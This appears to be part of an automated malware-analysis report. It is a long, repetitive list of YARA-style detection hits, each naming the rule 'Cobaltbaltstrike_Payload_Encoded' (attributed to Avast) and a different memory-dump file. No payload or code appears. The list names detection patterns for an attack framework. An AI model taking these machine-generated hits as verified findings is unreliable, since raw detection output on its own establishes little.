                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500504965.0000000006DD2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499684731.0000000006E71000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509423270.0000000005BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500246766.0000000006E08000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568757163.0000000006E43000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505927561.000000000636D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500477251.0000000006DD8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508961693.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500075794.0000000006E2E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499611659.0000000006E81000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500491953.0000000006DD5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499493418.0000000006E94000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508307572.0000000005E40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500524387.0000000006DCF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500409413.0000000006DE2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503297847.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500310887.0000000006DF5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505719347.0000000006392000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500548113.0000000006DC9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500261822.0000000006E04000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500418706.0000000006DDF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568673308.0000000006E23000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507852725.0000000005EC1000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568682358.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508838061.0000000005C41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499473983.0000000006E97000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500155514.0000000006E1B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499623622.0000000006E7E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508459967.0000000005DBA000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568748602.0000000006E40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568710134.0000000006E30000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507100056.00000000060F1000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499889442.0000000006E4D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506175810.00000000062EE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508628056.0000000005D0F000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499641627.0000000006E7A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499824941.0000000006E5D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506705393.000000000618E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501596100.0000000006A80000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501243619.0000000006B54000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500112961.0000000006E27000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499962160.0000000006E3E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500328316.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568738886.0000000006E3C000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509561363.0000000005B0A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507377946.0000000006041000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568792297.0000000006E50000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499598965.0000000006E84000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504952600.000000000646C000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500604850.0000000006CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499944069.0000000006E41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504750760.00000000064EB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502123395.00000000068FF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499912534.0000000006E47000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500175997.0000000006E14000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506567409.0000000006230000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499654163.0000000006E77000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500392333.0000000006DE5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500656702.0000000006C3A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500133947.0000000006E21000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507760692.0000000005EF2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499706418.0000000006E6E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504345055.000000000656C000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499750187.0000000006E67000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499521324.0000000006E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508543817.0000000005DB8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501697332.0000000006A21000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501200856.0000000006C04000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509127714.0000000005BC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500032754.0000000006E31000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.567918240.0000000006071000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502899282.0000000006741000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503663386.0000000006640000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500236769.0000000006E0B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507414149.0000000006071000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509264079.0000000005B78000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507996577.0000000005E41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499506056.0000000006E91000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508112663.0000000005E1F000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499764114.0000000006E64000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500280490.0000000006DFE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507642082.0000000005F41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.567865973.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500590066.0000000006DBF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.503439579.00000000066C0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502667836.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502479061.0000000006841000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507423559.0000000005FC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502365955.00000000067F3000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499804770.0000000006E61000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508327386.0000000005DBE000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508977198.0000000005C2E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508083711.0000000005EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507943546.0000000005E86000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500124456.0000000006E24000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499664750.0000000006E74000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507900626.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.502171014.0000000006880000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501943577.0000000006902000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499900664.0000000006E4A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501775845.00000000069FF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507263765.000000000606A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.505360761.00000000063EC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506426333.000000000626E000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500371775.0000000006DEB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509507876.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568633989.0000000006E16000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500271247.0000000006E01000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509762082.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568691207.0000000006E29000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.507305461.0000000005FE5000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500574937.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500300611.0000000006DF8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500381322.0000000006DE8000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499851554.0000000006E57000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.568719259.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504543226.0000000006527000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000002.569049205.0000000006E9D000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499716165.0000000006E6A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506765353.0000000006170000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.506625375.00000000061EF000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509636935.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508201854.0000000005DC2000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.501854915.0000000006980000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499572225.0000000006E8B000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500537921.0000000006DCC000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.500290954.0000000006DFB000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509363516.0000000005B41000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499838198.0000000006E5A000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.499586408.0000000006E87000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.509707518.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.508774998.0000000005C75000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
                                                                                                                                              • Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000019.00000003.504055585.00000000065C0000.00000004.00000800.00020000.00000000.sdmp, Author: Avast Threat Intel Team
